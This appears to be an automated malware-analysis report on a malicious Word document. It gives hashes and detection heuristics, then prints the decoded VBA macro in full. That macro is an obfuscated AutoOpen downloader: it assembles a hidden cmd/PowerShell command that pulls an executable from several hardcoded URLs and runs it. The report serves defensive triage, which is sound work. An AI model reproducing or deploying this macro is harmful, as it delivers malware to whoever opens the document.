Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13cbc6196cfe79f1…

MALICIOUS

Office (OLE)

71.1 KB Created: 2018-09-17 15:57:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: ea779117ee025bc63f722fba0da9fe56 SHA-1: 8314c4b4a911cf9a680c45fbaf8f98bd042a5c88 SHA-256: 13cbc6196cfe79f109e75cdec73bfc75b0439081b0df50ca70a449dc77fcc7f8
112 Risk Score

Heuristics 6

  • ClamAV: Doc.Malware.Generic-6687740-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6687740-0
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5118 bytes
SHA-256: a478abc4592bc56e3dbf540c5d37afd00bfb7e1cd8f85655e39427080fed7dc4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
23 of 47 identifiers look randomly generated (e.g. 'WQujRVwwzsiSCT'); 9 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "OkVlhQFqzKskz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const pRsVFWlF = 0
   Dim JDjawZ(4)
JDjawZ(0) = Left(lLzRTvTJ, 277)
JDjawZ(1) = Left(lLzRTvTJ, 277)
JDjawZ(2) = Left(lLzRTvTJ, 277)
JDjawZ(3) = Mid(NcQCwcS, 322, 870)
   Dim WzBjbI(3)
WzBjbI(0) = Right(cPtfRz, 591)
WzBjbI(1) = Left(lLzRTvTJ, 277)
WzBjbI(2) = MidB(PLmGaNfW, 353, 844)
   Dim mdaHii(3)
mdaHii(0) = Left(lLzRTvTJ, 277)
mdaHii(1) = Mid(NcQCwcS, 322, 870)
mdaHii(2) = Right(cPtfRz, 591)
   Dim kdjvzK(2)
kdjvzK(0) = Left(lLzRTvTJ, 277)
kdjvzK(1) = Right(cPtfRz, 591)
   Dim OhWfv(3)
OhWfv(0) = Left(lLzRTvTJ, 277)
OhWfv(1) = Mid(NcQCwcS, 322, 870)
OhWfv(2) = Mid(NcQCwcS, 322, 870)
Shell@ kMPhW + ZUjQOrtsonbaBq + JiOwdEWnRV, CInt(pRsVFWlF)
   Dim MjJMX(5)
MjJMX(0) = Right(cPtfRz, 591)
MjJMX(1) = Right(cPtfRz, 591)
MjJMX(2) = MidB(PLmGaNfW, 353, 844)
MjJMX(3) = Right(cPtfRz, 591)
MjJMX(4) = Left(lLzRTvTJ, 277)
   Dim vGhsk(2)
vGhsk(0) = Left(lLzRTvTJ, 277)
vGhsk(1) = MidB(PLmGaNfW, 353, 844)
   Dim qUudwf(3)
qUudwf(0) = Right(cPtfRz, 591)
qUudwf(1) = Mid(NcQCwcS, 322, 870)
qUudwf(2) = Mid(NcQCwcS, 322, 870)
End Sub


Attribute VB_Name = "WQujRVwwzsiSCT"
Function kMPhW()
Dim JUioOY(4)
JUioOY(0) = Left(lLzRTvTJ, 277)
JUioOY(1) = Mid(NcQCwcS, 322, 870)
JUioOY(2) = Right(cPtfRz, 591)
JUioOY(3) = MidB(PLmGaNfW, 353, 844)
   Dim qLTflQ(2)
qLTflQ(0) = Right(cPtfRz, 591)
qLTflQ(1) = Mid(NcQCwcS, 322, 870)
   Dim jRWJV(2)
jRWJV(0) = MidB(PLmGaNfW, 353, 844)
jRWJV(1) = Mid(NcQCwcS, 322, 870)
   Dim GimiYJ(3)
GimiYJ(0) = MidB(PLmGaNfW, 353, 844)
GimiYJ(1) = Left(lLzRTvTJ, 277)
GimiYJ(2) = Right(cPtfRz, 591)
jKDrjwGYzX = Format(Chr(4 + 13 + 17 + 11 + 54)) + "md /V^:^O" + "/" + Format(Chr(3 + 9 + 11 + 8 + 36)) + Format(Chr(1 + 4 + 5 + 3 + 21)) + "^s^et ^s^W=^  ^  ^ ^    ^ ^" + "      ^ ^}^" + "}^{h" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "t^" + "a" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "}^;k^a^er^b;^Oi^L^$ m^e" + "^tI^-^e^k^ov" + "nI;)^O^i^L$ ,^OHV$(^el^i"
Dim LVmznJ(4)
LVmznJ(0) = Right(cPtfRz, 591)
LVmznJ(1) = MidB(PLmGaNfW, 353, 844)
LVmznJ(2) = MidB(PLmGaNfW, 353, 844)
LVmznJ(3) = MidB(PLmGaNfW, 353, 844)
   Dim Wpfzuf(3)
Wpfzuf(0) = Left(lLzRTvTJ, 277)
Wpfzuf(1) = Mid(NcQCwcS, 322, 870)
Wpfzuf(2) = Left(lLzRTvTJ, 277)
XSzvfEYWz = "^F^dao^lnw^oD^" + ".Rdp^${yr^t^{" + ")r^wE$ n^i^ OHV$(h" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^a^ero^f;" + "^'^exe.'^+EEM$+'" + "\'+" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^i^l" + "^bup:vn^e$^=" + "^O^iL$"
Dim MzJGLR(4)
MzJGLR(0) = Left(lLzRTvTJ, 277)
MzJGLR(1) = Mid(NcQCwcS, 322, 870)
MzJGLR(2) = Right(cPtfRz, 591)
MzJGLR(3) = Left(lLzRTvTJ, 277)
   Dim njYHhQ(2)
njYHhQ(0) = Right(cPtfRz, 591)
njYHhQ(1) = Mid(NcQCwcS, 322, 870)
nqpzSnKp = ";'76^9^'^ ^= ^EEM^$^;" + ")'@^'(^t^i^l^p^S^.'^Lv^J" + "O8v^6^B/m^o" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^.^m^ae^bnr" + "o^p//^:^p^" + "tth@^T^B^L^" + "mOr8^d/m^o" + Format(Chr(4 + 13 + 17 + 11 + 54)) + ".20bef^" + "2^0//^:^pt^th@g^aDys^"
Dim PbDnLD(4)
PbDnLD(0) = Mid(NcQCwcS, 322, 870)
PbDnLD(1) = MidB(PLmGaNfW, 353, 844)
PbDnLD(2) = Right(cPtfRz, 591)
PbDnLD(3) = Mid(NcQCwcS, 322, 870)
CamjGpKZUEG = "jV" + Format(Chr(3 + 9 + 11 + 8 + 36)) + "/^z^k^.tnamada" + "//^:^sp" + "^t^t^h^@" + "^a^5^bq3^k^qx/rb.^m^" + "o" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^.ar^u^tet^i^u^qr^aort^a" + "u^q^a//^:^pt^t^h^@Zig^HVBj" + "^T^i5/^m^o" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^.^sel" + "asn^g^i^la//:^" + "p^t^th'^=rw^E^$^;tne^il" + Format(Chr(3 + 9 + 11 + 8 + 36)) + "beW.t^eN^ t" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^e^j^" + "bo^-^we" + "n^=Rdp$ "
Dim EcMoub(4)
EcMoub(0) = Mid(NcQCwcS, 322, 870)
EcMoub(1) = Mid(NcQCwcS, 322, 870)
EcMoub(2) = Mid(NcQCwcS, 322, 870)
EcMoub(3) = MidB(PLmGaNfW, 353, 844)
   Dim mlVJY(4)
mlVJY(0) = MidB(PLmGaNfW, 353, 844)
mlVJY(1) = Right(cPtfRz, 591)
mlVJY(2) = Left(lLzRTvTJ, 277)
mlVJY(3) = Right(cPtfRz, 591)
   Dim owzVK(3)
owzVK(0) = Mid(NcQCwcS, 322, 870)
owzVK(1) = MidB(PLmGaNfW, 353, 844)
owzVK(2) = Left(lLzRTvTJ, 277)
   Dim DOhhd(2)
DOhhd(0) = Mid(NcQCwcS, 322, 870)
DOhhd(1) = Left(lLzRTvTJ, 277)
bWJEVjvKQ = "l^lehsrew^o^p&" + "&^f^or /^L %^P ^" + "in (369^;-^1^;^0)d^" + "o s^e^t N^h=" + "!N^h!!^s^W:~" + "%^P,1!&&^i" + "^f %^P=^=0 " + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^a^l^l %N^h:^~^4%" + Format(Chr(1 + 4 + 5 + 3 + 21)) + ""
kMPhW = jKDrjwGYzX + XSzvfEYWz + nqpzSnKp + CamjGpKZUEG + bWJEVjvKQ
   Dim mcsZfo(3)
mcsZfo(0) = Right(cPtfRz, 591)
mcsZfo(1) = Left(lLzRTvTJ, 277)
mcsZfo(2) = Left(lLzRTvTJ, 277)
   Dim cYZTcd(4)
cYZTcd(0) = Mid(NcQCwcS, 322, 870)
cYZTcd(1) = Mid(NcQCwcS, 322, 870)
cYZTcd(2) = Mid(NcQCwcS, 322, 870)
cYZTcd(3) = Mid(NcQCwcS, 322, 870)
   Dim aDzZdV(4)
aDzZdV(0) = Left(lLzRTvTJ, 277)
aDzZdV(1) = Mid(NcQCwcS, 322, 870)
aDzZdV(2) = Right(cPtfRz, 591)
aDzZdV(3) = Right(cPtfRz, 591)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.